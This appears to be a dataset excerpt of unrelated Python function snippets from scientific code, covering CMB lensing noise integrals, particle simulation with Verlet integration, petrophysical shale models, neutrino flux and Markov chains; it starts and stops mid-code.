cond_GT['Nz']))\n\n FPI_operator(cond_GT['weight'], phiw_div_phib_arr, phiw_div_phib_arr_new, N_skip=1) # phiw(0) must be phib.\n\n return 0", "def _r_inv(self):\n raise NotImplementedError", "def N_TE_EB(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_EB(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEB(l2)\n result += 0. #self.F_EB(l2, l1, -phi)*self.CMB.ftotalTB(l1)*self.CMB.ftotalEE(l2)\n result *= self.F_TE(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TE_EB.__func__, \"integ\"):\n self.N_TE_EB.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TE_EB.integ(integrand, nitn=8, neval=1000)\n result = self.N_TE_EB.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def intf_ENTPGRAM(E):\n # !! Need to check for some eids being TRIs. 
Filter that out.\n if ( not inc.entid_or_LST_of_entids(E.The,3) or \n not inc.point_formatted_LST(E.The,2) or\n not inc.point_formatted_LST(E.The,1) ):\n print(\"Input Error: pgram\")\n print(intf_ENTPGRAM.__doc__)\n return # Without doing much of anything.\n oB= [ xyz.val for xyz in E.The.StackPop().val ] # A list [3.5 -2 0].\n oA= [ xyz.val for xyz in E.The.StackPop().val ] # A list [3.5 -2 0].\n myeids= E.The.StackPop().val\n if type(myeids)==type(list()):\n #myeids= map(lambda x:x.val, myeids) # Should now be a list of ints.\n myeids= [x.val for x in myeids] # Should now be a list of ints.\n else:\n myeids= [ myeids ] # Also a (1 item) list of ints.\n neweidlist= []\n for myeid in myeids:\n if myeid in MMEL.El: # Check if eid exists.\n src_ent= MMEL.El[myeid]\n new_ent= src_ent.duplicate()\n new_ent.translate([ oB[0]-oA[0], oB[1]-oA[1], oB[2]-oA[2] ])\n As= mm.Entity.allplist.PLdict[ src_ent.epts[0] ]\n Ae= mm.Entity.allplist.PLdict[ src_ent.epts[1] ]\n Bs= mm.Entity.allplist.PLdict[ new_ent.epts[0] ]\n Be= mm.Entity.allplist.PLdict[ new_ent.epts[1] ]\n neweidlist.append(new_ent.eid)\n MMEL.add_ent(new_ent)\n line_entS= mm.Line_Entity( [As,Bs] )\n neweidlist.append(line_entS.eid)\n MMEL.add_ent(line_entS)\n line_entE= mm.Line_Entity( [Ae,Be] )\n neweidlist.append(line_entE.eid)\n MMEL.add_ent(line_entE)\n tri_entA= mm.Tri_Entity( [As, Ae, Bs] )\n neweidlist.append(tri_entA.eid)\n MMEL.add_ent(tri_entA)\n tri_entB= mm.Tri_Entity( [Bs, Be, Ae] )\n neweidlist.append(tri_entB.eid)\n MMEL.add_ent(tri_entB)\n else:\n print(\"WARNING: Entity ID# %d does not exist.\" % myeid)\n if neweidlist:\n neweids= objectifier.StackOB_LST( [objectifier.StackOB_VAL(x) for x in neweidlist] )\n E.The.StackPush(neweids)\n OUT.default(MMEL,E) # AUTODUMP ", "def test_nr_trinuc(self):\n preds = [\n MotifChange(\"A\", \"C\"),\n MotifChange(\"G\", \"A\"),\n MotifChange(\"CGA\", \"TGA\"),\n ]\n sm = substitution_model.TimeReversibleTrinucleotide(predicates=preds)\n got = sm.get_param_list()\n self.assertEqual(got, [\"A/C\", \"G/A\", \"CGA/TGA\"])\n self.assertEqual(len(sm.get_motifs()), 64)", "def test_compute_inventory():\n T = [1000]\n c_max = [1e20]\n time = 1e3\n inv, sig = divHretention.compute_inventory(T, c_max, time)\n assert len(inv) == len(sig)\n assert len(inv) == len(T)", "def Phi_nu_mu1(self, E_nu, N=1e24):\n #check this \n try:\n phi = [0.]*len(E_nu)\n\n Int = lambda x: self.crossSection(x) * self.protonFlux(x) * self.F_nu_mu_1(E_nu/x, x) / x\n\n for i, E_nu in enumerate(E_nu):\n logE_min = np.log10(E_nu)\n logE_max = 10\n\n Intervals = int(np.ceil(logE_max-logE_min))\n\n IntegrationBoundary = np.logspace(logE_min, logE_max, Intervals+1)\n #print IntegrationBoundary\n\n for j in range(Intervals):\n phi[i] += 1.6*N*quad(Int, IntegrationBoundary[j], IntegrationBoundary[j+1])[0]\n\n return np.array(phi)\n\n except TypeError as e:\n phi = 0.\n\n Int = lambda x: self.crossSection(x) * self.protonFlux(x) * self.F_nu_mu_1(E_nu/x, x) / x\n\n logE_min = np.log10(E_nu)\n logE_max = 10\n\n Intervals = int(np.ceil(logE_max-logE_min))\n IntegrationBoundary = np.logspace(logE_min, logE_max, Intervals+1)\n #print IntegrationBoundary\n for i in range(Intervals):\n phi += 1.6*N*quad(Int, IntegrationBoundary[i], IntegrationBoundary[i+1])[0]\n print (phi)\n\n return phi", "def KPMO(XVal,YVal_State_1,YVal_State_2,YVal_State_3,XVal_Mean_Trans_1,XVal_Mean_Trans_2,XVal_Sig_Trans_1,XVal_Sig_Trans_2,iOpt):\n#\t1. 
Computations:\n\tTiny=1E-20\n\tP_Trans_1 = fCPD(XVal,XVal_Mean_Trans_1, XVal_Sig_Trans_1) # Transition of kerogen from State #1 to State #2\n\tP_Trans_2 = fCPD(XVal,XVal_Mean_Trans_2, XVal_Sig_Trans_2) # Transition of kerogen from State #2 to State #3\n\tFunVal=0\n\tif(iOpt==0):\n\t\tP_State_1=(1-P_Trans_1)*(1-P_Trans_2)\n\t\tP_State_2=P_Trans_1*(1 - P_Trans_2)\n\t\tP_State_3=1-P_State_1-P_State_2\n\t\tFunVal=(YVal_State_1*P_State_1)+(YVal_State_2*P_State_2)+(YVal_State_3*P_State_3)\n\tif(iOpt==1):\n\t\tFunVal=YVal_State_1+P_Trans_1*YVal_State_2+P_Trans_2*YVal_State_3\n\tif(FunVal==0):\n\t\tFunVal=Tiny\n\treturn FunVal", "def solveverlet(self,T,dt):\r\n t = 0.\r\n self.dt = dt\r\n self.n = int(T/dt)\r\n L = self.param[2]\r\n N = self.particles.size\r\n\r\n self.U = np.zeros([self.n])\r\n\r\n progress = t/T*100\r\n\r\n #JV: Here we define the number of the GxG grid that we will need to calcule the entropy, change in order to change the precision of this grid\r\n self.G = 7\r\n\r\n #JV: We create a list that will be useful for the walls submenu, that will help us in the border conditions of the wall, see in vel_verlet()\r\n self.bouncing = np.zeros(self.particles.size)\r\n\r\n if(self.param[4] == \"Subsystems\"): #JV: If we are on \"Subsystems\", we will count different the types of particles\r\n self.grid = np.zeros([self.G,self.G,2])\r\n else:\r\n self.grid = np.zeros([self.G,self.G,2]) #JV: When we are not in \"Subsystems\", we will have the same type of variable, but will only use the [:,:,0] (this is because numba has problems otherwise)\r\n\r\n self.entropy_val = 0\r\n\r\n #JV: If we are simulating the brownian simulation, we initialize the array that will keep track if the brownian particle goes through a wall\r\n if(self.param[4] == \"Brownian\"):\r\n self.wallcount = np.zeros([2])\r\n else:\r\n self.wallcount = np.zeros([2]) #JV: We have to keep both in the same type of variables, otherwise numba will have problems. So now this conditional block is quite poinless. 
TO-ERASE\r\n\r\n np.vectorize(lambda i: i.reset())(self.particles) #This line resets the particles to their initial position\r\n\r\n self.vel_verlet_on = True #JV: If it's true, it will compute with the velocity verlet algorithm, if it's not, it will compute with normal verlet\r\n\r\n self.Nlist = int(1*(self.particles.size)**(1/2)) #JV:This variable defines the number of close particles that will be stored in the list (go to close_particles_list() for more info)\r\n #print(self.Nlist)\r\n\r\n #X,Y,VX,VY has the trajectories of the particles with two indexes that\r\n #access time and particles, respectively\r\n self.X = np.vectorize(lambda i: i.r[0])(self.particles)\r\n self.Y = np.vectorize(lambda i: i.r[1])(self.particles)\r\n self.VX = np.vectorize(lambda i: i.v[0])(self.particles)\r\n self.VY = np.vectorize(lambda i: i.v[1])(self.particles)\r\n\r\n MX, MXT = np.meshgrid(self.X[:],self.X[:])\r\n MY, MYT = np.meshgrid(self.Y[:],self.Y[:])\r\n\r\n #JV: So dx is a nxn simetric array with 0 in the diagonal, and each position is the corresponding distance between the particles,\r\n # so the position [1,2] is the distance between partcle 1 and 2 (x1-x2), and so on\r\n dx = MXT - MX\r\n dx = dx\r\n\r\n dy = MYT - MY\r\n dy = dy\r\n\r\n r2 = np.square(dx)+np.square(dy)\r\n\r\n self.close_list = close_particles_list(r2,self.Nlist,self.particles.size,self.param[2]) #JV: we first calculate the matrix that contains in every row the indexs of the m closest particles\r\n\r\n if(self.vel_verlet_on == True):\r\n #JV: We define the variables that we will need in the velocity verlet algorithm\r\n print(\"Computing with the Velocity-Verlet algorithm\")\r\n X0 = self.X\r\n Y0 = self.Y\r\n VX0 = self.VX\r\n VY0 = self.VY\r\n\r\n X1 = self.X\r\n Y1 = self.Y\r\n VX1 = self.VX\r\n VY1 = self.VY\r\n\r\n MX, MXT = np.meshgrid(X0[:],X0[:],copy=False)\r\n MY, MYT = np.meshgrid(Y0[:],Y0[:],copy=False)\r\n dx = MXT - MX\r\n dx = dx\r\n\r\n dy = MYT - MY\r\n dy = dy\r\n\r\n r2 = np.square(dx)+np.square(dy)\r\n\r\n if(np.round((t/self.dt*dt)%0.5,1) == 0): #JV: every certain amount of steps we update the list\r\n self.close_list = close_particles_list(r2,self.Nlist,self.particles.size,self.param[2]) #JV: matrix that contains in every row the indexs of the m closest particles\r\n\r\n a0 = (1/self.m)*np.transpose(fv(X0[:],Y0[:],dx,dy,r2,t/self.dt,False,self.param[2],self.particles.size,self.U,self.dt,self.close_list,self.Nlist,self.vel_verlet_on,self.R,self.param[3],self.param[4],self.param[5],self.grid,self.G,self.wallcount,self.X2))\r\n\r\n for i in range(0, self.n):\r\n r1 = np.array([X0,Y0]) + np.array([VX0,VY0])*dt + 0.5*a0*dt**2\r\n\r\n MX, MXT = np.meshgrid(r1[0,:],r1[0,:],copy=False)\r\n MY, MYT = np.meshgrid(r1[1,:],r1[1,:],copy=False)\r\n dx = MXT - MX\r\n dx = dx\r\n\r\n dy = MYT - MY\r\n dy = dy\r\n\r\n r2 = np.square(dx)+np.square(dy)\r\n\r\n if(self.param[3] == \"Free!\"):\r\n #JV: We do this to get the actual distance in the case of the \"Free!\" simulation, in which there is no elastic collision between the particles and the boundaries\r\n dx_v2 = (np.abs(dx.copy())-1*L)\r\n r2_v2 = dx_v2**2+dy**2\r\n dx = np.where(r2 > r2_v2,dx_v2*np.sign(dx),dx)\r\n r2 = np.where(r2 > r2_v2,r2_v2,r2)\r\n dy_v2 = (np.abs(dy.copy())-1*L)\r\n r2_v2 = dx**2+dy_v2**2\r\n dy = np.where(r2 > r2_v2,dy_v2*np.sign(dy),dy)\r\n r2 = np.where(r2 > r2_v2,r2_v2,r2)\r\n r2_v2 = dx_v2**2+dy_v2**2\r\n dx = np.where(r2 > r2_v2,dx_v2*np.sign(dx),dx)\r\n dy = np.where(r2 > r2_v2,dy_v2*np.sign(dy),dy)\r\n r2 = np.where(r2 > 
r2_v2,r2_v2,r2)\r\n\r\n #JV: call velocityverlet to compute the next position\r\n if(np.round((t/self.dt*dt)%0.5,1) == 0): #JV: every certain amount of steps we update the list\r\n self.close_list = close_particles_list(r2,self.Nlist,self.particles.size,self.param[2]) #JV: matrix that contains in every row the indexs of the m closest particles\r\n\r\n X1,Y1,VX1,VY1,a1 = vel_verlet(t,dt,np.array([X0,Y0]),np.array([VX0,VY0]),a0,dx,dy,r2,self.close_list,self.m,self.R,L,N,self.param[3],self.param[4],self.param[7],self.param[8],self.param[9],self.U,self.Nlist,self.vel_verlet_on,self.param[5],self.grid,self.G,self.wallcount,self.X2,self.bouncing)\r\n\r\n #JV: Now we check where this particle is in a RxR grid, that will help us to calcule the entropy. We do not do this for the Brownian mode because we don't compute the entropy in that case.\r\n if(self.param[4] != \"Brownian\"):\r\n for h in range(0, N):\r\n if(self.param[4] == \"Subsystems\"):\r\n if(h < self.param[5]**2): #JV: self.param[5] stores the number of n1xn1 type 1 particles\r\n self.grid[int((X1[h]+0.495*L) / (L/self.G)), int((Y1[h]+0.495*L) / (L/self.G)),0] += 1\r\n else:\r\n self.grid[int((X1[h]+0.495*L) / (L/self.G)), int((Y1[h]+0.495*L) / (L/self.G)),1] += 1\r\n else:\r\n self.grid[int((X1[h]+0.495*L) / (L/self.G)), int((Y1[h]+0.495*L) / (L/self.G))] += 1\r\n\r\n if(self.param[4] == \"Brownian\"):\r\n if(self.wallcount[0] == 0):\r\n self.X2 = np.append(self.X2,(abs(X1[N-1]))**2)\r\n else:\r\n self.X2 = np.append(self.X2,(L*self.wallcount[0]+(X1[N-1]))**2)\r\n self.entropy = np.append(self.entropy,self.entropy_val)\r\n\r\n t += dt\r\n\r\n self.X = np.vstack((self.X,X1))\r\n self.Y = np.vstack((self.Y,Y1))\r\n self.VX = np.vstack((self.VX, VX1))\r\n self.VY = np.vstack((self.VY, VY1))\r\n a0 = a1\r\n\r\n #Redefine and repeat\r\n X0,Y0 = X1,Y1\r\n VX0,VY0 = VX1,VY1\r\n\r\n #JV: Every amount of steps of time we calculate the entropy\r\n update_entropy = 2\r\n if(i % update_entropy == 0):\r\n\r\n self.entropy_val = 0\r\n sumagrid = np.sum(self.grid)\r\n\r\n if(self.param[4] == \"Subsystems\"):\r\n sumagrid_subs = np.zeros([2])\r\n sumagrid_subs[0] = np.sum(self.grid[:,:,0]) #JV: Number of type-0 particles\r\n sumagrid_subs[1] = sumagrid - sumagrid_subs[0] #JV: Number of type-1 particles\r\n\r\n for j in range(self.G):\r\n for k in range(self.G):\r\n for l in range(2):\r\n if ((self.grid[j,k,0]+self.grid[j,k,1]) != 0):\r\n # pji = float(self.grid[j,k,l])/(update_entropy*(self.grid[j,k,0]+self.grid[j,k,1]))\r\n pji = float((self.grid[j,k,l]/(sumagrid_subs[l]/(sumagrid_subs[0]+sumagrid_subs[1])))/(update_entropy*(self.grid[j,k,0]/(sumagrid_subs[0]/(sumagrid_subs[0]+sumagrid_subs[1])))+(self.grid[j,k,1]/(sumagrid_subs[1]/(sumagrid_subs[0]+sumagrid_subs[1])))))\r\n else:\r\n pji = 0\r\n if(pji != 0):\r\n self.entropy_val += -pji*np.log(pji) #JV: We will only calculate the value when pji != 0\r\n\r\n self.entropy_val = self.entropy_val /(self.G**2)\r\n\r\n else:\r\n for j in range(self.G):\r\n for k in range(self.G):\r\n pji = float(self.grid[j,k,0])/(update_entropy*sumagrid)\r\n if(pji != 0):\r\n self.entropy_val += -pji*np.log(pji)\r\n\r\n self.entropy_val = self.entropy_val /(self.G**2)\r\n\r\n if(self.param[4] == \"Subsystems\"):\r\n self.grid = np.zeros([self.G,self.G,2])\r\n else:\r\n self.grid = np.zeros([self.G,self.G,2])\r\n\r\n #Update and show progress through console\r\n progress = t/T*100\r\n if(i%1000 == 0):\r\n print(int(progress),'% done')\r\n\r\n else:\r\n print(\"Computing with the Verlet algorithm\")\r\n\r\n #Generation of 
the precious position (backwards euler step)\r\n X1 = self.X\r\n Y1 = self.Y\r\n X0 = X1 - self.VX*dt\r\n Y0 = Y1 - self.VY*dt\r\n\r\n for self.i in range(0,self.n):\r\n #Call verlet to compute the next position\r\n X2,Y2 = self.verlet(t,dt,np.array([X0,Y0]),np.array([X1,Y1]))\r\n t = t + dt\r\n\r\n #Add the new positions to X,Y,VX,VY\r\n self.X = np.vstack((self.X,X2))\r\n self.Y = np.vstack((self.Y,Y2))\r\n self.VX = np.vstack((self.VX,(X2-X0)/(2*dt)))\r\n self.VY = np.vstack((self.VY,(Y2-Y0)/(2*dt)))\r\n\r\n #Redefine and repeat\r\n X0,Y0 = X1,Y1\r\n X1,Y1 = X2,Y2\r\n\r\n #Update and show progress through console\r\n progress = t/T*100\r\n if(self.i%1000 == 0):\r\n print(int(progress),'% done')\r\n\r\n #Once the computation has ended, I compute the kinetic energy,\r\n #the magnitude of the velocity V and the temperature\r\n #(see doc for temperature definition)\r\n self.KE()\r\n self.V = np.sqrt((self.VX**2 + self.VY**2))\r\n self.T = (np.sum(self.V**2,axis=1)/(self.particles.size*2 - 2))\r\n\r\n #Generation of the MB functions, you can modify the definition by\r\n #changing the linspace points\r\n vs,a = np.meshgrid(np.linspace(0,self.V.max(),100),self.T)\r\n a,ts = np.meshgrid(np.linspace(0,self.V.max(),100),self.T)\r\n self.MB = (vs/(ts)*np.exp(-vs**2/(2*ts)))\r\n\r\n #JV: If we are on the Subsystems submenu, we will calculate the temperature and the MB distribution of both types of particles\r\n if(self.param[4] == \"Subsystems\"):\r\n\r\n #JV: 1st group of particles\r\n self.V1 = np.sqrt((self.VX[:,0:(self.param[5]**2)]**2 + self.VY[:,0:(self.param[5]**2)]**2))\r\n self.T1 = (np.sum(self.V1**2,axis=1)/((self.param[5]**2)*2 - 2))\r\n\r\n vs1,a1 = np.meshgrid(np.linspace(0,self.V1.max(),100),self.T1)\r\n a1,ts1 = np.meshgrid(np.linspace(0,self.V1.max(),100),self.T1)\r\n self.MB1 = (vs1/(ts1)*np.exp(-vs1**2/(2*ts1)))\r\n\r\n #JV: 2nd group\r\n self.V2 = np.sqrt((self.VX[:,(self.param[5]**2):self.particles.size]**2 + self.VY[:,(self.param[5]**2):self.particles.size]**2))\r\n self.T2 = (np.sum(self.V2**2,axis=1)/((self.particles.size-self.param[5]**2)*2 - 2))\r\n\r\n vs2,a2 = np.meshgrid(np.linspace(0,self.V2.max(),100),self.T2)\r\n a2,ts2 = np.meshgrid(np.linspace(0,self.V2.max(),100),self.T2)\r\n self.MB2 = (vs2/(ts2)*np.exp(-vs2**2/(2*ts2)))\r\n\r\n \"\"\"Here I generate the accumulated V,T and MB using lists, the reason I use lists is because if you append two numpy arrays\r\n to an empty numpy array, they merge instead of remaining separate. 
You could technically use splicing to save on memory\r\n but sacrificing cpu.\"\"\"\r\n\r\n self.Vacu = []\r\n self.Tacu = []\r\n self.MBacu = []\r\n self.Vacu.append(self.V[int(self.n/2),:])\r\n self.Tacu.append(np.sum(self.V[int(self.n/2),:]**2)/(self.particles.size*2 - 2))\r\n\r\n vs = np.linspace(0,self.V.max(),100)\r\n self.MBacu.append((vs/(self.Tacu[0])*np.exp(-vs**2/(2*self.Tacu[0]))))\r\n\r\n #This delta controls the time interval for accumulation, right now its every 5 units\r\n delta = 5./dt\r\n\r\n #This 40 that appers in these lines is the time from which I start accumulating\r\n #to ensure the system has reached equilibrium.\r\n for i in range(1,int((self.n-(40./dt))/delta)):\r\n self.Vacu.append(np.hstack((self.Vacu[i-1],self.V[int(40./dt)+int(i*delta),:])))\r\n self.Tacu.append(np.sum(self.Vacu[i]**2)/(self.Vacu[i].size*2 - 2))\r\n self.MBacu.append((vs/(self.Tacu[i])*np.exp(-vs**2/(2*self.Tacu[i]))))\r\n return", "def N_TE_EE(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = self.F_EE(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEE(l2)\n result += self.F_EE(l2, l1, -phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEE(l2)\n result *= self.F_TE(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TE_EE.__func__, \"integ\"):\n self.N_TE_EE.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TE_EE.integ(integrand, nitn=8, neval=1000)\n result = self.N_TE_EE.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def eval(self, sample):\n '''\n jv = sample.get(JOINT_VELOCITIES)\n eepv = sample.get(END_EFFECTOR_POINT_VELOCITIES)\n\n boxpos = jv[:, 2:5]\n fingerpos = eepv[:, 7:10]\n tgtpos = np.zeros((100,3))\n for i in range(100):\n tgtpos[i] = [0.6, 0.2, 0.1]\n \n fetchdist = np.sum((boxpos - fingerpos) ** 2, axis=1)\n liftdist = np.sum((boxpos - tgtpos) ** 2, axis=1)\n \n l = fetchdist + liftdist\n '''\n\n eept = sample.get(END_EFFECTOR_POINTS)\n eepv = sample.get(END_EFFECTOR_POINT_VELOCITIES)\n sample_u = sample.get_U()\n cfrc_ext = np.concatenate((eept[:, 13:56], eepv[:, 0:41]), axis = 1)\n # vec = eepv[:, 64:66] \n # dist = np.sum(np.square(vec), axis=1) / 5\n forward_reward = eepv[:, 53]\n scaling = 150\n ctrl_cost = 0.5 * 1e-2 * np.sum(np.square(sample_u / scaling), axis = 1)\n # contact_cost = 0.5 * 1e-3 * np.sum(np.square(cfrc_ext), axis = 1)\n # survive_reward = 0.5\n \n l = -forward_reward + ctrl_cost\n\n prefix=''\n logger.record_tabular('PolReturn', -sum(l))\n\n ave_vel = np.mean(forward_reward)\n min_vel = np.min(forward_reward)\n max_vel = np.max(forward_reward)\n std_vel = np.std(forward_reward)\n logger.record_tabular(prefix+'PolAverageVelocity', ave_vel)\n logger.record_tabular(prefix+'PolMinVelocity', min_vel)\n logger.record_tabular(prefix+'PolMaxVelocity', max_vel)\n logger.record_tabular(prefix+'PolStdVelocity', std_vel)\n logger.dump_tabular(with_prefix=False)\n \n lx, lu, lxx, luu, lux = 0, 0, 0, 0, 0\n\n '''\n # Compute weighted sum of each cost value and derivatives.\n weight = self._weights[0]\n l = l * weight\n lx = lx * weight\n lu = lu * weight\n lxx = lxx * weight\n luu = luu * weight\n lux = lux * weight\n for i in range(1, 
len(self._costs)):\n pl, plx, plu, plxx, pluu, plux = self._costs[i].eval(sample)\n weight = self._weights[i]\n l = l + pl * weight\n lx = lx + plx * weight\n lu = lu + plu * weight\n lxx = lxx + plxx * weight\n luu = luu + pluu * weight\n lux = lux + plux * weight\n '''\n \n return l, lx, lu, lxx, luu, lux", "def test_get_nveto_pmt_item(self):\n pass", "def t(l3,Ei,Et,Et_axis):\n Ef=Ei-Et\n T=(-(l3/vFrmE(Ef))+(l3/np.sqrt(vFrmE(Ei)**2-vsq_from_E(Et_axis))))*1e6\n return (T)", "def ORM2(RHOB,PHIN,DTCO,RD,Dw,HIw,DTw,Rw,Df,HIf,DTf,Rf,Da,HIa,DTa,Ra,Dc1,HIc1,DTc1,PHIc1,Rc1,Dc2,HIc2,DTc2,PHIc2,Rc2,Dc3,HIc3,DTc3,PHIc3,Rc3,Ck,Dk,HIk,DTk,PHIk,Rk,RSK,Cwv,Ckv,Alpha,Sxoe):\n#\n# 5.1.1 Initialise Outputs & Check for missing values in inputs:\n# --------------------------------------------------------------\n\tPHIt=MissingValue\n\tPHIe=MissingValue\n\tCBW=MissingValue\n\tBVW=MissingValue\n\tHCPV=MissingValue\n\tVf=MissingValue\n\tVs=MissingValue\n\tSwt=MissingValue\n\tSwe=MissingValue\n\tVc1=MissingValue\n\tVc2=MissingValue\n\tVc3=MissingValue\n\tVk=MissingValue\n\tToc=MissingValue\n\tQc=MissingValue\n\tGDen=MissingValue\n\tif MissingValue in (RHOB,PHIN,DTCO,RD,Dw,HIw,DTw,Rw,Df,HIf,DTf,Rf,Da,HIa,DTa,Ra,Dc1,HIc1,DTc1,PHIc1,Rc1,Dc2,HIc2,DTc2,PHIc2,Rc2,Dc3,HIc3,DTc3,PHIc3,Rc3,Ck,Dk,HIk,DTk,PHIk,Rk,RSK,Cwv,Ckv,Alpha,Sxoe):\n\t\treturn PHIt,PHIe,CBW,BVW,HCPV,Vf,Vs,Swt,Swe,Vc1,Vc2,Vc3,Vk,Toc,Qc,GDen\n#\n# 5.1.2 Initialise parameters:\n# ----------------------------\n#\t5.1.2.1 Initialise Interation Control Paramaeters:\n#\t--------------------------------------------------\n\tNIter=0\n\tNIterMax=100\n\tErrIter=10000\n\tTolErrIter=0.0001\n\tIterEnd=0\n#\n#\t5.1.2.2 Initialise Volumes and Hydrocarbon Properties:\n#\t------------------------------------------------------\n\tVk=0.000 # Volume of kerogen initialised to zero\n\tVa=0.000 # Volume of adsorbed gas initialised to zero\n\tVf=0.000 # Volume of free gas initialised to zero\n#\n#\t5.7.3 Start interative loop:\n#\t-----------------------------\n\twhile IterEnd==0:\n#\n# 5.7.3.1 Compute Pore Fluid Properties:\n# --------------------------------------\n\t\tSum=Va+Vf\n\t\tif(Sum==0):\n\t\t\tDh=Df\n\t\t\tHIh=HIf\n\t\t\tDTh=DTf\n\t\telse:\n\t\t\tDh=(Va*Da+Vf*Df)/Sum\n\t\t\tHIh=(Va*HIa+Vf*HIf)/Sum\n\t\t\tDTh=(Va*DTa+Vf*DTf)/Sum\n\t\tDpf=(Sxoe*Dw)+(1-Sxoe)*Dh # Density of pore fluid\n\t\tHIpf=(Sxoe*HIw)+(1-Sxoe)*HIh # Hydrogen Index of pore fluid\n\t\tDTpf=(Sxoe*DTw)+(1-Sxoe)*DTh # DT of pore fluid\t\n#\n#\t5.7.3.2 Matrix Inversion:\n#\t-------------------------\n\t\tYMatrix = [RHOB,PHIN,1] # Populate YMatrix\n\t\tAMatrix = [[Dc1,Dk,Dpf],[HIc1,HIk,HIpf],[1,1,1]] # Populate AMatrix\n\t\tXMatrix,Qc=SolveAndCorrect(AMatrix,YMatrix) # Solve for XMatrix\n\t\tVc1=XMatrix[0] # Volume of component 1\n\t\tVc2=0.000 # Volume of component 2\n\t\tVc3=0.000 # Volume of component 3 (not calculated in this routine).\n\t\tVk=XMatrix[1] # Volume of organic component\n\t\tPHIe=XMatrix[2] # Volume of hydrocarbon in organic and inorganic pores\n#\n#\t5.7.3.3 Determine Total & Effective Water Saturations:\n#\t-----------------------------------------------------\n\t\tPHIm=(Vc1*PHIc1)+(Vc2*PHIc2)+(Vc3*PHIc3) # Compute Micro Porosity\n\t\tPHIt=PHIm+PHIe\n\t\tSwe=fConnectivityModel(RD,Vc1,Vc2,Vc3,Vk,PHIe,Rc1,Rc2,Rc3,Rk,Rw,Rf,Cwv,Ckv,Alpha)\n\t\tif(PHIt==0):\n\t\t\tSwt=1.000\n\t\telse:\n\t\t\tSwt=(PHIm+PHIe*Swe)/PHIt\n#\n#\t5.7.4.3 Compute Volume of Adsorbed and Free Gas:\n#\t------------------------------------------------\n\t\tVa=RSK*Vk # Volume of adsorbed gas in organic 
pores\n\t\tHCPV=PHIt*(1-Swt)\n\t\tif(Va>=HCPV):\n\t\t\tVa=HCPV\n\t\tVf=HCPV-Va # Volume of free gas\t\n#\n# 5.4.4 Test for interative computations:\n# ---------------------------------------\n\t\tNIter=NIter+1\n\t\tif(NIter>=NIterMax):\n\t\t\tIterEnd=1\n\t\telse:\t\t\t\n\t\t\tif(NIter<=2):\n\t\t\t\tResultOld=[1,1,1,1,1,1,1,1,1] # Initial Setting\n\t\t\t\tResultNew=[Vc1,Vc2,Vc3,Vk,Va,Vf,PHIe,Swt,Swe] # Current Results\n\t\t\t\tErrIter=ComputeMatrixDifference(ResultOld,ResultNew)\n\t\t\t\tResultOld=ResultNew\n\t\t\telse:\n\t\t\t\tResultNew=[Vc1,Vc2,Vc3,Vk,Va,Vf,PHIe,Swt,Swe] # Current Results\n\t\t\t\tErrIter=ComputeMatrixDifference(ResultOld,ResultNew)\n\t\t\t\tResultOld=ResultNew\n\t\t\t\tif(ErrIter<=TolErrIter):\n\t\t\t\t\tIterEnd=1\n#\n# 5.4.6 Preoutput computations:\n# ------------------------------\n\tCBW=PHIm # The assumption is that all microporosity can be considered to be clay bound water.\n\tBVW=PHIe*Swe # Bulk volume of water\n\tHCPV=PHIt*(1-Swt) # Hydrocarbon pore volume\t\n\tToc=fToc_Wtf(Vc1,Vc2,Vc3,Vk,0,Ck,Dc1,Dc2,Dc3,Dk,Dw) # TOC-wt fraction. Note: Vrw=0 in fToc_Wtf(Vc1,Vc2,Vc3,Vk,Vrw,Ck,Dc1,Dc2,Dc3,Dk,Dw) # Total Organic Carbon wt%\n\tGDen=fOrmGDen(Vc1,Vc2,Vc3,Vk,0,Dc1,Dc2,Dc3,Dk,Dw) # Grain Density. Note: Vrw=0 in fOrmGDen(Vc1,Vc2,Vc3,Vk,Vrw,Dc1,Dc2,Dc3,Dk,Dw) # Grain Density g/cm3\n#\n# 5.4.7 Output Results:\n# \t-------------------\n\treturn PHIt,PHIe,CBW,BVW,HCPV,Vf,Va,Swt,Swe,Vc1,Vc2,Vc3,Vk,Toc,Qc,GDen", "def _mn_par_ ( self , i ) :\n if not i in self : raise IndexError\n #\n val = ctypes.c_double ( 0 ) \n err = ctypes.c_double ( 0 ) \n #\n res = self.GetParameter ( i , val , err )\n #\n val = float ( val.value )\n err = float ( err.value )\n #\n return VE ( val , err*err )", "def ec_matrix_vector(p0, T, n): \n if(n<=0):\n EC=np.zeros(T.shape)\n return EC\n else:\n \"\"\"Probability vector after (k=0) propagations\"\"\" \n p_k=1.0*p0\n \"\"\"Sum of vectors after (k=0) propagations\"\"\"\n p_sum=1.0*p_k \n for k in xrange(n-1):\n \"\"\"Propagate one step p_{k} -> p_{k+1}\"\"\"\n p_k=np.dot(p_k,T) \n \"\"\"Update sum\"\"\"\n p_sum+=p_k \n \"\"\"Expected counts\"\"\"\n EC=p_sum[:,np.newaxis]*T \n return EC", "def marcovNuc (i = random.choice(stateSpace), step = 100):\n # matrix of transition probabilities\n #matrix = [[0.25, 0.25, 0.25, 0.25], [0.25, 0.25, 0.25, 0.25], [0.25, 0.25, 